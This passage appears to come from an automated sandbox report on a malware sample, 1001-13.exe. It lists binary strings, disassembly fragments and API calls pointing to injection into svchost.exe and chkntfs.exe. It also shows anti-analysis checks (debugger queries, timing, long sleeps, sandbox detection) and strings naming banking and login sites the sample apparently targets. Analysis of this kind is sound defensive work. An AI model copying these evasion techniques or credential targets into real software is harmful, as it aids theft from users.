                Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000002.00000003.2598512878.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630084907.0000000003000000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000003.2568978860.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000002.3994500303.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OlGIUOYUZW.exe, 00000007.00000002.3993968948.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp, OlGIUOYUZW.exe, 00000009.00000000.2701407747.0000000000B4E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 1001-13.exe, 00000000.00000003.2149278295.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 1001-13.exe, 00000000.00000003.2144905912.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2528254273.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2526500510.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.0000000003600000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3996132293.00000000049EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2632794925.00000000046A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3996132293.0000000004850000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2630152367.00000000044F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 1001-13.exe, 00000000.00000003.2149278295.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 1001-13.exe, 00000000.00000003.2144905912.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2528254273.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2526500510.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630200261.0000000003600000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000008.00000002.3996132293.00000000049EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2632794925.00000000046A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3996132293.0000000004850000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000008.00000003.2630152367.00000000044F2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: chkntfs.pdb source: svchost.exe, 00000002.00000003.2598512878.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2630084907.0000000003000000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000003.2568978860.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000007.00000002.3994500303.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: chkntfs.exe, 00000008.00000002.3997004684.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3994276659.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000000.2701682547.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2919416002.000000002299C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000008.00000002.3997004684.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3994276659.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000000.2701682547.000000000269C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2919416002.000000002299C000.00000004.80000000.00040000.00000000.sdmp
                Source: 1001-13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 1001-13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 1001-13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 1001-13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 1001-13.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E342DE
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E50A76 push ecx; ret 0_2_00E50A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004179D0 push cs; ret 2_2_004179D9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403250 push eax; ret 2_2_00403252
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418A37 push eax; iretd 2_2_00418A41
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418AFA push ecx; iretd 2_2_00418B07
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414AA3 push edi; retf 2_2_00414AAE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040837A push D2B59A72h; retf 2_2_00408389
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412308 push ebp; iretd 2_2_00412331
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013D7 pushad ; iretd 2_2_004013DD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013E0 pushad ; iretd 2_2_004013E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D41F push 84DD7E08h; ret 2_2_0040D42B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040156D push dword ptr [eax-65h]; ret 2_2_00401577
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E64B push edx; retf 2_2_0041E650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417E3D push ds; iretd 2_2_00417E3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004016A0 push 905F3456h; iretd 2_2_004016AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414F5F push ds; ret 2_2_00414F61
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360225F pushad ; ret 2_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036027FA pushad ; ret 2_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx2_2_036309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360283D push eax; iretd 2_2_03602858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360135F push eax; iretd 2_2_03601369
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465DC36 push eax; iretd 7_2_0465DC40
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465DCF9 push ecx; iretd 7_2_0465DD06
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_04659CA2 push edi; retf 7_2_04659CAD
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0464D532 push D2B59A72h; retf 7_2_0464D588
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_04657507 push ebp; iretd 7_2_04657530
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465261E push 84DD7E08h; ret 7_2_0465262A
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465D03C push ds; iretd 7_2_0465D03D
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465A15E push ds; ret 7_2_0465A160
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0464C3C2 push ebx; ret 7_2_0464C4CC
                Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exeCode function: 7_2_0465CBCF push cs; ret 7_2_0465CBD8
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E4F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E4F98E
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EC1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00EC1C41
                Source: C:\Users\user\Desktop\1001-13.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1001-13.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\1001-13.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_0-96751
Source: C:\Users\user\Desktop\1001-13.exe | API/Special instruction interceptor: Address: 1489F34
Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\chkntfs.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
Source: 1001-13.exe, 00000000.00000002.2158725984.0000000001414000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FIDDLER.EXEEX=
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E rdtsc 2_2_0367096E
Source: C:\Users\user\Desktop\1001-13.exe | API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
Source: C:\Windows\SysWOW64\chkntfs.exe | API coverage: 2.9 %
Source: C:\Windows\SysWOW64\chkntfs.exe TID: 3084 | Thread sleep count: 39 > 30
Source: C:\Windows\SysWOW64\chkntfs.exe TID: 3084 | Thread sleep time: -78000s >= -30000s
Source: C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe TID: 1464 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\chkntfs.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E6C2A2 FindFirstFileExW
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA68EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E9D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E9D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E9DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA5C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_0058CFA0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: 721e5H878.8.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 721e5H878.8.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 721e5H878.8.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 721e5H878.8.dr | Binary or memory string: discord.comVMware20,11696487552f
Source: 721e5H878.8.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 721e5H878.8.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 721e5H878.8.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 721e5H878.8.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 721e5H878.8.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 721e5H878.8.dr | Binary or memory string: global block list test formVMware20,11696487552
Source: 721e5H878.8.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 721e5H878.8.dr | Binary or memory string: AMC password management pageVMware20,11696487552
Source: chkntfs.exe, 00000008.00000002.3994276659.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3994740266.000000000072F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 721e5H878.8.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 0000000A.00000002.2921173288.000001F7E2A4D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllcc
Source: 721e5H878.8.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 721e5H878.8.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 721e5H878.8.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 721e5H878.8.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 721e5H878.8.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 721e5H878.8.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 721e5H878.8.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 721e5H878.8.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 721e5H878.8.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 721e5H878.8.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 721e5H878.8.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 721e5H878.8.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 721e5H878.8.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 721e5H878.8.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 721e5H878.8.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 721e5H878.8.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 721e5H878.8.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 721e5H878.8.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\chkntfs.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E rdtsc 2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418153 LdrLoadDll
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EAEAA2 BlockInput
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E62622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E54CE8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_0148A1A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_0148A200 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_01488B90 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h]2_2_036B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B035C mov eax, dword ptr fs:[00000030h]2_2_036B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h]2_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h]2_2_036D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370634F mov eax, dword ptr fs:[00000030h]2_2_0370634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03708324 mov eax, dword ptr fs:[00000030h]2_2_03708324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h]2_2_0366A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h]2_2_0362C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h]2_2_03650310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h]2_2_036403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h]2_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036663FF mov eax, dword ptr fs:[00000030h]2_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h]2_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h]2_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]2_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]2_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
